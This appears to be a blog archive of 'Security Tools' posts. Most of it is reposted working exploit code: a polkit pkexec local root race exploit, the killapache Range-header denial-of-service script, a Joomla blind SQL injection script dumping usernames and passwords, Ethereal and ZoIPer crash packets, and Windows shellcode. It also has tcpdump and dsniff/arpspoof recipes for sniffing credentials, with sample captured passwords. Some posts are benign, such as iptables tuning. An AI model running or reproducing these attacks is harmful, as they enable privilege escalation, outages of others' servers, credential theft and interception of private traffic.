Oct 06

linux local privilege escalation on polkit-1 <= 0.101

By jason Security Tools No Comments »

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* –end–
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec –version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102′s bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");
 
    if (fork()) {
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

Tagged with:
Aug 25

Apache httpd Remote Denial of Service memory exhaustion

By jason Security Tools No Comments »

        Publish Time:08-25-2011

        Exploit method:

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
   
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;    
   
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                  Proto    => ‘tcp’);

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                  Proto    => ‘tcp’);

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1;   
} else {
    return 0;   
}
}

if ($#ARGV < 0) {
    usage;
    exit;   
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;   
}
while(1) {
killapache();
}

Tagged with:
May 28

sniffer tools example – 1

By jason Security Tools No Comments »

Sniffer/Howto Sniff Contents of the emails

  • Sniff emails sent to 1.2.3.4
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 25
  • View the sniffed email data
    wireshark -r sniff.smtp.pcap
    • click on your "sending email address"
    • click on "message text" to view the email contents
  • Sniff insecure POP email
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 110
  • Sniff insecure imap email
    tcpdump -nnvvvS -s 0 -U -w sniff.smtp.pcap dst 1.2.3.4 and dst port 143

Sniffer/Howto Sniff web connections for login/passwd

    tcpdump -nnvvvS -s 0 -U -w sniff.web.pcap dst 1.2.3.4 and dst port 80 wireshark -r sniff.web.pcap

Sniffer/Howto Sniff ftp/telnet connections for login/passwd

    tcpdump -nnvvvS -s 0 -U -w sniff.telnet.pcap dst 1.2.3.4 and dst port 21 wireshark -r sniff.telnet.pcap
Tagged with:
Apr 07

sniffer tools for Centos–dsniff

By jason Security Tools No Comments »

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Home Page (http://monkey.org/~dugsong/dsniff/)

INSTALL Dsniff:

1. software list

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

libnids-1.18.tar.gz

dsniff-2.3.tar.gz

2. install gcc and openssl

yum –y install openssl gcc flex bison libpcap-devel libnet

3. install libnids

# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install

4. install  dsniff

./configure  –prefix=/usr –-without-db

make

make install

   If your Centos Version is greater 5.3 you can use yum method install it.

yum install dsniff

5. Test dsniff

dsniff –n –i eth0

Output:

04/07/11 15:00:45 tcp 192.168.1.135.3791 -> 122.55.2.222.110 (pop3)
USER hr
PASS xxx123

—————–
04/07/11 15:01:19 tcp 192.168.1.196.4747 -> 122.55.2.222.110 (pop3)
USER cx
PASS chenxia1

—————–
04/07/11 15:01:20 tcp 192.168.1.134.2086 -> 122.55.2.222.110 (pop3)
USER aa-1@xxxx.com
PASS aa-11

—————–
04/07/11 15:01:44 tcp 192.168.1.150.3630 -> 122.55.2.222.110 (pop3)
USER aa-3@xxxx.com
PASS iker-31

5.1 Test 2 (urlsnarf -n -i eth1)

Output:

urlsnarf: listening on eth1 [tcp port 80 or port 8080 or port 3128]
192.168.1.75 – - [07/Apr/2011:15:07:11 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=89170&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.75 – - [07/Apr/2011:15:07:12 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=71906&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.137 – - [07/Apr/2011:15:07:13 +0800] "GET http://safeurl.maxthon.cn/data/config.dat HTTP/1.1" – - "-" "MxAgent"
192.168.1.75 – - [07/Apr/2011:15:07:13 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=12334&s=0 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"

5.3 arp proxy (switch network sniffer)

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -t 192.168.1.100 192.168.1.1

       Open a new terminal

dsniff –n –i eth1

Tagged with:
Mar 16

Windows Server 2003 Enterprise Edition SP1 ita calc.exe shellcode 36 bytes

By jason Security Tools No Comments »

#include <stdio.h>
#include <string.h>

char liscker[] = 
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00"; 

int main(int argc, char **argv) 

    int (*shellcode)(); 
    shellcode = (int (*)()) liscker; 
    (int)(*shellcode)();
}

Tagged with:
Mar 11

Free website security scanner tools – wwwscan

By jason Security Tools No Comments »

wwwscan is a very good free website security scanner tools,It can help you improve your website security level,hope it can help you.

<Usage>:  wwwscan <HostName|Ip> [Options]
<Options>:
          -p port        : set http/https port
          -m thread      : set max thread
          -t timeout     : tcp timeout in seconds
          -r rootpath    : set root path to scan
          -ssl           : will use ssl
<Example>:
          wwwscan www.target.com -p 8080 -m 10 -t 16
          wwwscan www.target.com -r "/test/" -p 80
          wwwscan www.target.com –ssl

You can download it from here.

Tagged with:
Mar 02

Iptables ip_conntrack table set-up and tunning for high load UDP traffic

By jason Security Tools No Comments »

If you run a busy DNS server or any other service that uses a lot of UDP traffic, it’s possible that your default Iptable conntrack sessions (connection tracking entries in kernel memory) settings are too low and netfilter is unable to track all your sessions.

The error is usually something like this:

Sep 10 12:53:44 hostname01 kernel: ip_conntrack: table full, dropping packet.

You need to tune sysctl net.ipv4.ip_conntrack_max value, let’s say increase it twice or more times and see if you still get the error messages on the console or syslog.

Depending on your OS, the formula for calculating the maximum number of conntrack sessions your box can handle is as follows:

The size of each session record really depends on the kernel config and many other compile options. For 2.6.* kernels it is around 300 bytes.

You can also easily check out the current usage of connection tracking

wc -l /proc/net/ip_conntrack

Default sysctl settings for Red Hat Enterprise boxes, possible the same applies for Fedora and Centos.

net.ipv4.netfilter.ip_conntrack_tcp_max_retrans = 3
net.ipv4.netfilter.ip_conntrack_tcp_be_liberal = 0
net.ipv4.netfilter.ip_conntrack_tcp_loose = 3
net.ipv4.netfilter.ip_conntrack_tcp_timeout_max_retrans = 300
net.ipv4.netfilter.ip_conntrack_log_invalid = 0
net.ipv4.netfilter.ip_conntrack_generic_timeout = 600
net.ipv4.netfilter.ip_conntrack_icmp_timeout = 30
net.ipv4.netfilter.ip_conntrack_udp_timeout_stream = 180
net.ipv4.netfilter.ip_conntrack_udp_timeout = 30
net.ipv4.netfilter.ip_conntrack_tcp_timeout_close = 10
net.ipv4.netfilter.ip_conntrack_tcp_timeout_time_wait = 120
net.ipv4.netfilter.ip_conntrack_tcp_timeout_last_ack = 30
net.ipv4.netfilter.ip_conntrack_tcp_timeout_close_wait = 60
net.ipv4.netfilter.ip_conntrack_tcp_timeout_fin_wait = 120
net.ipv4.netfilter.ip_conntrack_tcp_timeout_established = 432000
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_recv = 60
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_sent = 120
net.ipv4.netfilter.ip_conntrack_checksum = 1
net.ipv4.netfilter.ip_conntrack_buckets = 8192
net.ipv4.netfilter.ip_conntrack_count = 18988
net.ipv4.netfilter.ip_conntrack_max = 34576

You can decrease the net.ipv4.netfilter.ip_conntrack_tcp_timeout_established, by half, at least.

sysctl -w net.ipv4.netfilter.ip_conntrack_tcp_timeout_established=216000

I hope this helps you with your Linux server network stack tunning. Good luck!

Tagged with:
Feb 26

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

By jason Security Tools No Comments »

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
Tagged with:
Dec 07

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit

By jason Security Tools 4 Comments »

/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont < ethereal at simphalampin dot com >
*   www simphalempin com dev
*
* This vulnerability was found by:
*   Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
*   security e-matters de advisories 032004.html
*
* Vulnerable:
*  – Ethereal v0.10.2
*
* Not vulnerable:
*  – Ethreal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven’t tried.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
static const char packet[] =
        "x01" /* Version */
        "x04" /* Opcode: Reply */
        "x00x00" /* Checksum (invalid) */
        "x00x00x00x00" /* Flags */
        "x00x00x00x00" /* Sequence number */
        "x00x00x00x00" /* ACK */
        "x00x00x00x00" /* AS number */
        /* IP internal routes TLV */
        "x01x02" /* Type */
        "x00x39" /* Length (should be 0x1C) */
        "x00x00x00x00" /* Next hop */
        "x00x00x00x00" /* Delay */
        "x00x00x00x00" /* Bandwitdh */
        "x00x00x00" /* MTU */
        "x00" /* Hop count: directly connected */
        "xff" /* Reliability: maximum */
        "x01" /* Load: minimum */
        "x00x00" /* Reserved */
        "xff" /* Prefix length: should be > 0 and <= 32 */
        "x00x00x00" /* Destination network */
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xff" /* buffer overflow */
;
static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;
        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }
        len = sizeof (packet) – 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }
        puts ("Packet sent!");
        close (fd);
        return 0;
}
static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>n", path);
        return 2;
}
int
main (int argc, char *argv[])
{
        struct sockaddr *dest;
        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
                "proof of concept coden"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<x65x74x68x65x72x65x61x6cx40x73x69x6dx70"
                "x68x61x6cx65x6dx70x69x6ex2ex63x6fx6d>n");
        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;
                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;
                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %sn", argv[1],
                                        gai_strerror (check));
                        return 1;
                }
                dest = res->ai_addr;
        }
        return proof ((const struct sockaddr_in *)dest);
}

Tagged with:
Nov 27

ZoIPer V2.22 Call-Info Remote Denial Of Service

By jason Security Tools No Comments »

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars:   \x20  ,  \x09

import sys
import socket
import os

def main(argc , argv):

    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
    target_host = sys.argv[1]
    target_port = 5060

    evil_packet =   "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
                    "\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
                    "\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
                    "\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
                    "\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
                    "\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
                    "\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
                    "\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
                    "\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
                    "\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
                    "\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
                    "\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
                    "\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
                    "\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
                    "\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
                    "\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
                    "\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
                    "\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
                    "\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
                    "\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
                    "\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
                    "\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
                    "\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
                    "\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"
    os.system("cls")               
    print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
    print "[+] Exploited By Gr33n_G0bL1n\r\n"
    print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((target_host,target_port))
        print "[+] Trying To Send Evil Packet…\r\n"
        s.sendall(evil_packet)
        s.close()
        print "[+] Done!\r\n"
    except:
        print "[x] Connection Error!\r\n"

if (__name__ == "__main__"):
    sys.exit(main(len(sys.argv), sys.argv))

Tagged with:
Previous Entries
preload preload preload